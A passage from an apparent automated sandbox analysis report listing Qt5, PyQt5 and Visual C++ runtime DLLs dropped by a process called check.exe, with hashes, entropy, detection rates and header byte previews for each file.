SSDEEP:	6144:ZLvnUJ17UTGOkWHUe/W9TgYMDu96ixMZQ8IlXbKgp8aIDeN:KP7cGOGegTwu96ixMZQtlrPN
MD5:	0E8FF02D971B61B5D2DD1AC4DF01AE4A
SHA1:	638F0B46730884FA036900649F69F3021557E2FE
SHA-256:	1AA70B106A10C86946E23CAA9FC752DC16E29FBE803BBA1F1AB30D1C63EE852A
SHA-512:	7BA616EDE66B16D9F8B2A56C3117DB49A74D59D0D32EAA6958DE57EAC78F14B1C7F2DBBA9EAE4D77937399CF14D44535531BAF6F9DB16F357F8712DFAAE4346A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D..............+...../............).....+...O.+....+....O./...O....O..........O.(...Rich..........................PE..d...]._.........." .....\...<.......\..............................................K.....`..........................................h..to...................`...Q..............4.......T.......................(...`...0............p...............................text...yZ.......\.................. ..`.rdata..0....p.......`..............@..@.data...X....@......."..............@....pdata...Q...`...R...2..............@..@.rsrc...............................@..@.reloc..4...........................@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\bin\Qt5Gui.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	7008240
Entropy (8bit):	6.674290383197779
Encrypted:	false
SSDEEP:	49152:9VPhJZWVvpg+za3cFlc61j2VjBW77I4iNlmLPycNRncuUx24LLsXZFC6FOCfDt2/:BJZzI1ZR3U9Cxc22aDACInVc4Z
MD5:	47307A1E2E9987AB422F09771D590FF1
SHA1:	0DFC3A947E56C749A75F921F4A850A3DCBF04248
SHA-256:	5E7D2D41B8B92A880E83B8CC0CA173F5DA61218604186196787EE1600956BE1E
SHA-512:	21B1C133334C7CA7BBBE4F00A689C580FF80005749DA1AA453CCEB293F1AD99F459CA954F54E93B249D406AEA038AD3D44D667899B73014F884AFDBD9C461C14
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......QH^~.)0-.)0-.)0-.Q.-.)0-...-.)0-.F4,.)0-.F3,.)0-.F5,.)0-.F1,.)0-.Y1,.)0-.B5,.)0-.B1,.)0-.)1-m,0-.Y4,.)0-.Y5,\|(0-.Y0,.)0-.Y.-.)0-.).-.)0-.Y2,.)0-Rich.)0-................PE..d....._.........." ......?...+.....X.?.......................................k.....R.k...`.........................................pKK.....d.e.\|....`k.......g.......j......pk..6....F.T................... .F.(.....F.0.............?.p+...........................text...2.?.......?................. ..`.rdata...z&...?..\|&...?.............@..@.data....o... f.......f.............@....pdata........g.......f.............@..@.rsrc........`k.......j.............@..@.reloc...6...pk..8....j.............@..B........................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\bin\Qt5Network.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1340400
Entropy (8bit):	6.41486755163134
Encrypted:	false
SSDEEP:	24576:eXPn73RXox1U9M0m+1ffSDY565RzHUY1iaRy95hdGehEM:+7hXU1U95m4ff9A5RviaRy9NGI
MD5:	3569693D5BAE82854DE1D88F86C33184
SHA1:	1A6084ACFD2AA4D32CEDFB7D9023F60EB14E1771
SHA-256:	4EF341AE9302E793878020F0740B09B0F31CB380408A697F75C69FDBD20FC7A1
SHA-512:	E5EFF4A79E1BDAE28A6CA0DA116245A9919023560750FC4A087CDCD0AB969C2F0EEEC63BBEC2CD5222D6824A01DD27D2A8E6684A48202EA733F9BB2FAB048B32
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........Yt..7'..7'..7'...'..7'..3&..7'}.3&..7'}.4&..7'}.2&..7'}.6&..7'..6&..7'0.6&..7'..6'c.7'0.2&2.7'0.7&..7'0..'..7'...'..7'0.5&..7'Rich..7'........................PE..d....._.........." .................................................................c....`......................................... ....n..,...h....................X..........,.......T...................p...(...@...0............................................text...C........................... ..`.rdata...g.......h..................@..@.data...XN...@...2... ..............@....pdata...............R..............@..@.rsrc................>..............@..@.reloc..,............D..............@..B................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\bin\Qt5Qml.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	3591664
Entropy (8bit):	6.333693598000157
Encrypted:	false
SSDEEP:	98304:iPnt09+kVh2NrSdSG779LLLS/o/L4YqoY0Xba+mRRH2T:iPnt2ZVhT
MD5:	D055566B5168D7B1D4E307C41CE47C4B
SHA1:	043C0056E9951DA79EC94A66A784972532DC18EF
SHA-256:	30035484C81590976627F8FACE9507CAA8581A7DC7630CCCF6A8D6DE65CAB707
SHA-512:	4F12D17AA8A3008CAA3DDD0E41D3ED713A24F9B5A465EE93B2E4BECCF876D5BDF0259AA0D2DD77AD61BB59DC871F78937FFBE4D0F60638014E8EA8A27CAF228D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......W.4...Z...Z...Z......Z..^...Z..Y...Z.._...Z..[...Z...[...Z...[...Z...[...Z..._...Z...Z...Z.......Z......Z...X...Z.Rich..Z.........PE..d......_.........." .....^$..........O$.......................................7.....}.7...`...........................................,......2.......6.......4. .....6.......6..J....).T.....................).(...p.).0............p$..%...........................text....\$......^$................. ..`.rdata......p$......b$.............@..@.data.........3..n....2.............@....pdata.. .....4......l4.............@..@.rsrc.........6......`6.............@..@.reloc...J....6..L...f6.............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\bin\Qt5QmlModels.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	438768
Entropy (8bit):	6.312090336793804
Encrypted:	false
SSDEEP:	6144:k1tE6lq982HdyuEZ5gw+VHDZjZ0yOWm7Vdcm4GyasLCZCu6vdQp:k1tEuq9Hdyuo5gwguyOtVIup
MD5:	2030C4177B499E6118BE5B9E5761FCE1
SHA1:	050D0E67C4AA890C80F46CF615431004F2F4F8FC
SHA-256:	51E4E5A5E91F78774C44F69B599FAE4735277EF2918F7061778615CB5C4F6E81
SHA-512:	488F7D5D9D8DEEE9BBB9D63DAE346E46EFEB62456279F388B323777999B597C2D5AEA0EE379BDF94C9CBCFD3367D344FB6B5E90AC40BE2CE95EFA5BBDD363BCC
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..<...<...<...5.H.4...(...>.......*.......4.......8.......8......9...<...g....../......=....$.=...<.L.=......=...Rich<...................PE..d...M.._.........." .....(...r......d+..............................................MF....`.........................................0E...^..0................`.. F..................H...T.......................(.......0............@...............................text...N&.......(.................. ..`.rdata.......@.......,..............@..@.data...x/...0...(..................@....pdata.. F...`...H...>..............@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\bin\Qt5Quick.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	4148720
Entropy (8bit):	6.462183686222023
Encrypted:	false
SSDEEP:	49152:EcDwCQsvkBD+ClI3IAVLA7Tr15SokomoqxQhT2bAssCFEUGX5ig:E7CKPsA3p0Z/QV/sS3Ag
MD5:	65F59CFC0C1C060CE20D3B9CEFFBAF46
SHA1:	CFD56D77506CD8C0671CA559D659DAB39E4AD3C2
SHA-256:	C81AD3C1111544064B1830C6F1AEF3C1FD13B401546AB3B852D697C0F4D854B3
SHA-512:	D6F6DC19F1A0495026CBA765B5A2414B6AF0DBFC37B5ACEED1CD0AE37B3B0F574B759A176D75B01EDD74C6CE9A3642D3D29A3FD7F166B53A41C8978F562B4B50
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......!Fvge'.4e'.4e'.4l_.4i'.4.H.5m'.4.H.5a'.4.H.5\|'.4.H.5c'.4.W.5o'.4qL.5`'.4e'.4.,.4.W.5.'.4.W.5d'.4.W.4d'.4e'.4d'.4.W.5d'.4Riche'.4........................PE..d......_.........." ......%..B......L.$.......................................?.......?...`.........................................0)2.P.....8.T.....>.......<..^...2?.......?.py......T.......................(.......0............ %..\...........................text.....%.......%................. ..`.rdata....... %.......%.............@..@.data....I...@;..2... ;.............@....pdata...^....<..`...R<.............@..@.rsrc.........>.......>.............@..@.reloc..py....?..z....>.............@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\bin\Qt5Svg.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	330736
Entropy (8bit):	6.381828869454302
Encrypted:	false
SSDEEP:	6144:6qLZcTC3wR/0JNZ+csBkBv0L0hq+SvcO8MsvwbIeblsjTR:6qNcCwqHE2fYlsPR
MD5:	03761F923E52A7269A6E3A7452F6BE93
SHA1:	2CE53C424336BCC8047E10FA79CE9BCE14059C50
SHA-256:	7348CFC6444438B8845FB3F59381227325D40CA2187D463E82FC7B8E93E38DB5
SHA-512:	DE0FF8EBFFC62AF279E239722E6EEDD0B46BC213E21D0A687572BFB92AE1A1E4219322233224CA8B7211FFEF52D26CB9FE171D175D2390E3B3E6710BBDA010CB
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............_._._..*_._,.^._..^._,.^._,.^._,.^._a.^._._=.._a.^._a.^._a.F_._.._._a.^._Rich._................PE..d......_.........." .........................................................@.......^....`.................................................((....... ...........0...........0..H...xL..T....................N..(....L..0............................................text............................... ..`.rdata..p...........................@..@.data...8...........................@....pdata...0.......2..................@..@.rsrc........ ......................@..@.reloc..H....0......................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\bin\Qt5WebSockets.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	149488
Entropy (8bit):	6.116105454277536
Encrypted:	false
SSDEEP:	3072:4sSkET6pEXb3loojg1Q2sorWvZXF2sorrLA7cG27Qhvvc:4sSd6pwzloDbsnX0sCrc7ct7QVc
MD5:	A016545F963548E0F37885E07EF945C7
SHA1:	CBE499E53AB0BD2DA21018F4E2092E33560C846F
SHA-256:	6B56F77DA6F17880A42D2F9D2EC8B426248F7AB2196A0F55D37ADE39E3878BC6
SHA-512:	47A3C965593B97392F8995C7B80394E5368D735D4C77F610AFD61367FFE7658A0E83A0DBD19962C4FA864D94F245A9185A915010AFA23467F999C833982654C2
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........'`.CF.KCF.KCF.KJ>.KGF.K.).JAF.KW-.JAF.K.).JVF.K.).JKF.K.).J@F.K.6.JFF.KCF.K.G.K.6.JPF.K.6.JBF.K.6.KBF.KCF.KBF.K.6.JBF.KRichCF.K........................PE..d......_.........." .....$..........t(.......................................p.......5....`............................................."..l........P.......0.......,.......`..L...hw..T....................x..(....w..0............@...............................text....".......$.................. ..`.rdata..z....@.......(..............@..@.data...x...........................@....pdata.......0......................@..@.rsrc........P......."..............@..@.reloc..L....`.......(..............@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\bin\Qt5Widgets.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	5498352
Entropy (8bit):	6.619117060971844
Encrypted:	false
SSDEEP:	49152:KO+LIFYAPZtMym9RRQ7/KKIXSewIa/2Xqq1sfeOoKGOh6EwNmiHYYwBrK8KMlH0p:IGoKZdRqJD10rK8KMlH0gi5GX0oKZ
MD5:	4CD1F8FDCD617932DB131C3688845EA8
SHA1:	B090ED884B07D2D98747141AEFD25590B8B254F9
SHA-256:	3788C669D4B645E5A576DE9FC77FCA776BF516D43C89143DC2CA28291BA14358
SHA-512:	7D47D2661BF8FAC937F0D168036652B7CFE0D749B571D9773A5446C512C58EE6BB081FEC817181A90F4543EBC2367C7F8881FF7F80908AA48A7F6BB261F1D199
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........x..................I.......I.......I.......I...........................................9.................................Rich............PE..d....._.........." ......3..P .......3.......................................T......MT...`.........................................0.D.P^....L.h....pS......0P..8....S.......S.d.....?.T...................`.?.(...0.?.0.............3.._...........................text.....3.......3................. ..`.rdata..8.....3.......3.............@..@.data.........O......dO.............@....pdata...8...0P..:....O.............@..@.rsrc........pS......4S.............@..@.reloc..d.....S......:S.............@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\bin\VCRUNTIME140.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	101872
Entropy (8bit):	6.5661918084228725
Encrypted:	false
SSDEEP:	1536:RCKWZGuEK0mOLSTxoPl9GIcuZrxi4hXX9oix8H+NCIecbGShwZul:RFWY1WxgGStJ8H2CIecbG36
MD5:	971DBBE854FC6AB78C095607DFAD7B5C
SHA1:	1731FB947CD85F9017A95FDA1DC5E3B0F6B42CA2
SHA-256:	5E197A086B6A7711BAA09AFE4EA7C68F0E777B2FF33F1DF25A21F375B7D9693A
SHA-512:	B966AAB9C0D9459FADA3E5E96998292D6874A7078924EA2C171F0A1A50B0784C24CC408D00852BEC48D6A01E67E41D017684631176D3E90151EC692161F1814D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........w.............t:..............................................................Rich....................PE..d.....t^.........." .........^.......................................................e....`A.........................................0..4....9.......p.......P.......L...A..............8........................... ...0............................................text...2........................... ..`.rdata...?.......@..................@..@.data...0....@.......4..............@....pdata.......P.......8..............@..@_RDATA.......`.......D..............@..@.rsrc........p.......F..............@..@.reloc...............J..............@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\bin\VCRUNTIME140_1.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	44528
Entropy (8bit):	6.627837381503075
Encrypted:	false
SSDEEP:	384:Aim/NRETi8kykt25HwviU5fJUiP2551xWmbTqOA7SXf+Ny85xM8ATJWr3KWoC8cS:0Ie8kySL2iPQxdvjAevcMESW5lxJG
MD5:	6BC084255A5E9EB8DF2BCD75B4CD0777
SHA1:	CF071AD4E512CD934028F005CABE06384A3954B6
SHA-256:	1F0F5F2CE671E0F68CF96176721DF0E5E6F527C8CA9CFA98AA875B5A3816D460
SHA-512:	B822538494D13BDA947655AF791FED4DAA811F20C4B63A45246C8F3BEFA3EC37FF1AA79246C89174FE35D76FFB636FA228AFA4BDA0BD6D2C41D01228B151FD89
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ .S.A...A...A..0.m..A..O....A...9...A...A...A..O....A..O....A..O....A..O....A..O.}..A..O....A..Rich.A..................PE..d.....t^.........." .....:...4......pA...............................................Z....`A.........................................j......\|k..x....................l...A......8....b..8...........................@b..0............P..X............................text....9.......:.................. ..`.rdata... ...P..."...>..............@..@.data................`..............@....pdata...............b..............@..@.rsrc................f..............@..@.reloc..8............j..............@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\bin\d3dcompiler_47.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	4173928
Entropy (8bit):	6.329102290474506
Encrypted:	false
SSDEEP:	49152:8BfmqCtLI4erBYysLjG/A8McPyCD6hw16JVTW7B3EgvVlQ3LAYmyNOvGJse+aWyb:8eZevVKACOvWYQF
MD5:	B0AE3AA9DD1EBD60BDF51CB94834CD04
SHA1:	EE2F5726AC140FB42D17ABA033D678AFAF8C39C1
SHA-256:	E994847E01A6F1E4CBDC5A864616AC262F67EE4F14DB194984661A8D927AB7F4
SHA-512:	756EBF4FA49029D4343D1BDB86EA71B2D49E20ADA6370FD7582515455635C73D37AD0DBDEEF456A10AB353A12412BA827CA4D70080743C86C3B42FA0A3152AA3
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G..(.a.{.a.{.a.{..m{5a.{..l{.a.{.m{.a.{.o{.a.{.a.{.a.{.i{.a.{.l{.a.{.h{.a.{.q{.a.{.k{.a.{.n{.a.{Rich.a.{........................PE..d......R.........." ......;.........`.8......................................@@......a@...`...........................................;.u...P.>.d.....?.@.....=......t?.h<... ?..{..................................@a................>.P............................text.....;.......;................. ..`.data...h.....;.......;.............@....pdata........=......n<.............@..@.idata..@.....>......B>.............@..@.rsrc...@.....?......\>.............@..@.reloc....... ?......b>.............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\bin\libEGL.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	25072
Entropy (8bit):	5.961464514165753
Encrypted:	false
SSDEEP:	384:KEyYvsyDQrjwgut4Maw+XZndDGg7Dgf2hU:RvszjwgocwOhdDGEUf2hU
MD5:	BB00EF1DD81296AF10FDFA673B4D1397
SHA1:	773FFCF4A231B963BAAC36CBEF68079C09B62837
SHA-256:	32092DE077FD57B6EF355705EC46C6D21F6D72FBE3D3A5DD628F2A29185A96FA
SHA-512:	C87C0868C04852B63A7399AFE4E568CD9A65B7B7D5FD63030ABEA649AAC5E9F2293AB5BE2B2CE56A57F2B4B1992AE730150A293ADA53637FC5CD7BE0A727CBD4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9...Xv@.Xv@.Xv@. .@.Xv@.7wA.Xv@.3wA.Xv@.7sA.Xv@.7rA.Xv@.7uA.Xv@W(wA.Xv@.Xw@.Xv@W(sA.Xv@W(vA.Xv@W(.@.Xv@.X.@.Xv@W(tA.Xv@Rich.Xv@........PE..d...#._.........." .........0......................................................Z.....`.........................................`9.......B..d.......H....p.......F.......... ....3..T............................4..0............0...............................text............................... ..`.rdata..r#...0...$..................@..@.data........`.......:..............@....pdata.......p.......<..............@..@.rsrc...H............>..............@..@.reloc.. ............D..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\bin\libGLESv2.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	3385328
Entropy (8bit):	6.382356347494905
Encrypted:	false
SSDEEP:	49152:sU0O89Onk/cNTgO/WSLqfTPnK+9eaOiY95ZEQryD1pPG3L:MaHUKt3L
MD5:	2247EE4356666335DF7D72129AF8D600
SHA1:	F0131C1A67FC17C0E8DCC4A4CA38C9F1780E7182
SHA-256:	50FAD5605B3D57627848B3B84A744DFB6A045609B8236B04124F2234676758D8
SHA-512:	67F2A7BF169C7B9A516689CF1B16446CA50E57F099B9B742CCB1ABB2DCDE8867F8F6305AD8842CD96194687FC314715AE04C1942B0E0A4F51B592B028C5B16D3
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............t..t..t....t.A.p..t.A.w..t.A.q..t.A.u..t.u..t..u..t...q..t...t..t......t.....t...v..t.Rich..t.........PE..d....._.........." ......&.........L.&.......................................3.......3...`..........................................0..]....0.......3.P.....1.L.....3.......3..;...},.T...................P.,.(... ~,.0.............'..............................text...o.&.......&................. ..`.rdata........'.......&.............@..@.data.........1.......0.............@....pdata..L.....1.......1.............@..@.rsrc...P.....3......J3.............@..@.reloc...;....3..<...P3.............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\bin\opengl32sw.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	20923392
Entropy (8bit):	6.255903817217008
Encrypted:	false
SSDEEP:	393216:LIckHor5uLnn83wAP5hxOZEa7/LzRuDFqILn5LgcKyZyQXt+8M:yEZbv
MD5:	7DBC97BFEE0C7AC89DA8D0C770C977B6
SHA1:	A064C8D8967AAA4ADA29BD9FEFBE40405360412C
SHA-256:	963641A718F9CAE2705D5299EAE9B7444E84E72AB3BEF96A691510DD05FA1DA4
SHA-512:	286997501E1F5CE236C041DCB1A225B4E01C0F7C523C18E9835507A15C0AC53C4D50F74F94822125A7851FE2CB2FB72F84311A2259A5A50DCE6F56BA05D1D7E8
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[.@..............'.......'.......'..[...........\|.-.....\|.+....\|..<....'......../.....q.*.....q.+....q.&.^...q.......q.,.....Rich............PE..d....._W.........." .....(....b.....\|&....................................... E...........`.........................................0.1.t.....1...............9.`n............C..k.. . .T..................... .(..... ..............@...............................text...T&.......(.................. ..`.rdata..XvO..@...xO..,..............@..@.data....;....1.......1.............@....pdata..`n....9..p...D3.............@..@.gfids.......pC.......=.............@..@.tls..........C.......=.............@..._RDATA........C.......=.............@..@.reloc...k....C..l....=.............@..B................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\plugins\generic\qtuiotouchplugin.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	68080
Entropy (8bit):	6.207162014262433
Encrypted:	false
SSDEEP:	1536:mQ4IT53ign4CbtlO705xWL3frA5rlhgQJ7tapgUff:mLIT53Hbtk70OLs3hg0Cz
MD5:	750A31DE7840B5EED8BA14C1BD84D348
SHA1:	D345D13B0C303B7094D1C438E49F0046791DE7F6
SHA-256:	A9BFFB0F3CD69CD775C328C916E46440FE80D99119FAEBC350C7EC51E3E57C41
SHA-512:	5C0A68ED27A9F1BBFF104942152E475C94BB64B03CE252EAAC1A6770E24DC4156CE4ADE99EBCD92662801262DED892C33F84C605AD84472B45A83C4883D5E767
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............h..h..h...s.h..]...h.....h..]...h..]...h..]...h......h..h..&h......h......h......h......h..Rich.h..................PE..d...X._.........." .........b......$........................................@......{v....`......................................... ................ ..X....................0......H...T......................(.......0............................................text............................... ..`.rdata...E.......F..................@..@.data...............................@....pdata..............................@..@.qtmetadi...........................@..P.rsrc...X.... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\plugins\iconusers\qsvgicon.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	41968
Entropy (8bit):	6.0993566622860635
Encrypted:	false
SSDEEP:	768:VPs5g31JfDgej5JZmA0ZsEEC6lmn+4FdDGimUf2hr:VkC31ee7ZmA+sEEC6lmn+4FOUfc
MD5:	313F89994F3FEA8F67A48EE13359F4BA
SHA1:	8C7D4509A0CAA1164CC9415F44735B885A2F3270
SHA-256:	42DDE60BEFCF1D9F96B8366A9988626B97D7D0D829EBEA32F756D6ECD9EA99A8
SHA-512:	06E5026F5DB929F242104A503F0D501A9C1DC92973DD0E91D2DAF5B277D190082DE8D37ACE7EDF643C70AA98BB3D670DEFE04CE89B483DA4F34E629F8ED5FECF
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n.:..i..i..i#.Ei...i...h(..i>..h(..i...h8..i...h-..i...h(..i...h-..i..i...i...h(..i...h+..i..)i+..i...h+..iRich*..i........................PE..d......_.........." .....@...F.......F..............................................C.....`..........................................g..x...hh..........H...........................xX..T....................Z..(....X..0............P...............................text....>.......@.................. ..`.rdata...3...P...4...D..............@..@.data................x..............@....pdata...............z..............@..@.qtmetadj...........................@..P.rsrc...H...........................@..@.reloc..............................@..B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\plugins\imageformats\qgif.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	39408
Entropy (8bit):	6.0316011626259405
Encrypted:	false
SSDEEP:	768:ygk2hM0GskFtvPCjEIxh8eDzFyPddeeGvnhotdDGPUf2he:yN2a05kfPOEMaeDzFkddeFnhotOUfh
MD5:	52FD90E34FE8DED8E197B532BD622EF7
SHA1:	834E280E00BAE48A9E509A7DC909BEA3169BDCE2
SHA-256:	36174DD4C5F37C5F065C7A26E0AC65C4C3A41FDC0416882AF856A23A5D03BB9D
SHA-512:	EF3FB3770808B3690C11A18316B0C1C56C80198C1B1910E8AA198DF8281BA4E13DC9A6179BB93A379AD849304F6BB934F23E6BBD3D258B274CC31856DE0FC12B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........R...3..3..3..KA.3..o\..3..X..3..o\..3..o\..3..o\..3.."C..3..3...3.."C..3.."C..3.."C-.3.."C..3..Rich.3..........PE..d...H._.........." .....@...B.......E...............................................^....`..........................................f..t....f..........@............~..............HW..T....................X..(....W..0............P...............................text...k?.......@.................. ..`.rdata..&)...P...*...D..............@..@.data...(............n..............@....pdata...............p..............@..@.qtmetads............v..............@..P.rsrc...@............x..............@..@.reloc...............\|..............@..B........................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\plugins\imageformats\qicns.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	45040
Entropy (8bit):	6.016125225197622
Encrypted:	false
SSDEEP:	768:vEip0IlhxTDxut3dnm8IyAmQQ3ydJouEAkNypTAO0tfC3apmsdDG9Uf2hU:vxvXxgVIyA23ydJlEATpTAO0tfCKpms/
MD5:	AD84AF4D585643FF94BFA6DE672B3284
SHA1:	5D2DF51028FBEB7F6B52C02ADD702BC3FA781E08
SHA-256:	F4A229A082D16F80016F366156A2B951550F1E9DF6D4177323BBEDD92A429909
SHA-512:	B68D83A4A1928EB3390DEB9340CB27B8A3EB221C2E0BE86211EF318B4DD34B37531CA347C73CCE79A640C5B06FBD325E10F8C37E0CEE2581F22ABFBFF5CC0D55
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................a....Q........Q......Q......Q......................................Rich...........PE..d......_.........." .....B...N.......G...............................................&....`.............................................t...$...........@...........................xp..T....................r..(....p..0............`...............................text....@.......B.................. ..`.rdata...9...`...:...F..............@..@.data...............................@....pdata..............................@..@.qtmetadx...........................@..P.rsrc...@...........................@..@.reloc..............................@..B........................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\plugins\imageformats\qico.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	38384
Entropy (8bit):	5.957072398645384
Encrypted:	false
